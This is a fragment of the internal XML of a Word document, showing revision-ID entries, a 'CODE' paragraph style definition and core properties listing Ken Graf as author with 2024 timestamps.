    <w:rsid w:val="005E37B8"/>
    <w:rsid w:val="00633611"/>
    <w:rsid w:val="006458EB"/>
    <w:rsid w:val="00672D18"/>
    <w:rsid w:val="006827CA"/>
    <w:rsid w:val="0069358D"/>
    <w:rsid w:val="006C69FF"/>
    <w:rsid w:val="006C70C7"/>
    <w:rsid w:val="006E2D2A"/>
    <w:rsid w:val="006F3B3E"/>
    <w:rsid w:val="006F6E3C"/>
    <w:rsid w:val="0070368D"/>
    <w:rsid w:val="0070620F"/>
    <w:rsid w:val="00707377"/>
    <w:rsid w:val="007107A3"/>
    <w:rsid w:val="00712284"/>
    <w:rsid w:val="00713469"/>
    <w:rsid w:val="007165F5"/>
    <w:rsid w:val="00717DEF"/>
    <w:rsid w:val="00730851"/>
    <w:rsid w:val="00732DC3"/>
    <w:rsid w:val="00740EA7"/>
    <w:rsid w:val="00775BC9"/>
    <w:rsid w:val="007929B1"/>
    <w:rsid w:val="007A1589"/>
    <w:rsid w:val="007C1C2B"/>
    <w:rsid w:val="007E158B"/>
    <w:rsid w:val="008331D7"/>
    <w:rsid w:val="0084096D"/>
    <w:rsid w:val="00855380"/>
    <w:rsid w:val="00855E0A"/>
    <w:rsid w:val="00860C44"/>
    <w:rsid w:val="008704BE"/>
    <w:rsid w:val="0087428B"/>
    <w:rsid w:val="00894E82"/>
    <w:rsid w:val="008A3C74"/>
    <w:rsid w:val="008B6C94"/>
    <w:rsid w:val="008C3937"/>
    <w:rsid w:val="008D1C4A"/>
    <w:rsid w:val="008E1580"/>
    <w:rsid w:val="008E6F9C"/>
    <w:rsid w:val="008E7448"/>
    <w:rsid w:val="00901ECE"/>
    <w:rsid w:val="0090243F"/>
    <w:rsid w:val="00903023"/>
    <w:rsid w:val="00927E93"/>
    <w:rsid w:val="00951D26"/>
    <w:rsid w:val="009536CA"/>
    <w:rsid w:val="0095582E"/>
    <w:rsid w:val="00967225"/>
    <w:rsid w:val="00971EE5"/>
    <w:rsid w:val="00995394"/>
    <w:rsid w:val="009A0066"/>
    <w:rsid w:val="009A05E3"/>
    <w:rsid w:val="009A0B86"/>
    <w:rsid w:val="009A41D0"/>
    <w:rsid w:val="009D7633"/>
    <w:rsid w:val="009F6F10"/>
    <w:rsid w:val="00A00107"/>
    <w:rsid w:val="00A11D14"/>
    <w:rsid w:val="00A35D83"/>
    <w:rsid w:val="00A65F9F"/>
    <w:rsid w:val="00AA77D6"/>
    <w:rsid w:val="00AB0E53"/>
    <w:rsid w:val="00AD612E"/>
    <w:rsid w:val="00AD6DBC"/>
    <w:rsid w:val="00AD6E5C"/>
    <w:rsid w:val="00AE773D"/>
    <w:rsid w:val="00B25AF6"/>
    <w:rsid w:val="00B75FED"/>
    <w:rsid w:val="00BA3A24"/>
    <w:rsid w:val="00BB0F71"/>
    <w:rsid w:val="00BB5368"/>
    <w:rsid w:val="00BB5376"/>
    <w:rsid w:val="00BE6F3C"/>
    <w:rsid w:val="00BF4CB0"/>
    <w:rsid w:val="00C173CA"/>
    <w:rsid w:val="00C43BAB"/>
    <w:rsid w:val="00C55C6E"/>
    <w:rsid w:val="00C723AF"/>
    <w:rsid w:val="00C75ABB"/>
    <w:rsid w:val="00C93AC3"/>
    <w:rsid w:val="00CA0B91"/>
    <w:rsid w:val="00CB1D08"/>
    <w:rsid w:val="00CD7A9B"/>
    <w:rsid w:val="00D02828"/>
    <w:rsid w:val="00D10851"/>
    <w:rsid w:val="00D16489"/>
    <w:rsid w:val="00D327E7"/>
    <w:rsid w:val="00D47542"/>
    <w:rsid w:val="00D7687A"/>
    <w:rsid w:val="00DB4749"/>
    <w:rsid w:val="00DB58C7"/>
    <w:rsid w:val="00DC04D2"/>
    <w:rsid w:val="00DC1B82"/>
    <w:rsid w:val="00DC570F"/>
    <w:rsid w:val="00DE718C"/>
    <w:rsid w:val="00E332ED"/>
    <w:rsid w:val="00E64F51"/>
    <w:rsid w:val="00E91E36"/>
    <w:rsid w:val="00EA4E5D"/>
    <w:rsid w:val="00EA5F22"/>
    <w:rsid w:val="00EB1D09"/>
    <w:rsid w:val="00ED4CA1"/>
    <w:rsid w:val="00F113DD"/>
    <w:rsid w:val="00F1562B"/>
    <w:rsid w:val="00F30C4B"/>
    <w:rsid w:val="00F328CA"/>
    <w:rsid w:val="00F34211"/>
    <w:rsid w:val="00F46184"/>
    <w:rsid w:val="00F63466"/>
    <w:rsid w:val="00F6466E"/>
    <w:rsid w:val="00F70415"/>
    <w:rsid w:val="00F7155B"/>
    <w:rsid w:val="00F73B7A"/>
    <w:rsid w:val="00F91E8A"/>
    <w:rsid w:val="00F9508F"/>
    <w:rsid w:val="00F969B5"/>
    <w:rsid w:val="00FB2099"/>
    <w:rsid w:val="00FB22FE"/>
    <w:rsid w:val="00FE0870"/>
    <w:rsid w:val="00FE1F24"/>
    <w:rsid w:val="00FF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7117"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1F894F81-05B9-4994-BD49-605F9E5E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5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A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A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5B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B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DBC"/>
    <w:rPr>
      <w:color w:val="96607D" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CODE">
    <w:name w:val="CODE"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="002C21A1"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="360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3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Graf</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ken Graf</cp:lastModifiedBy>
  <cp:revision>105</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-07T13:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-18T00:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>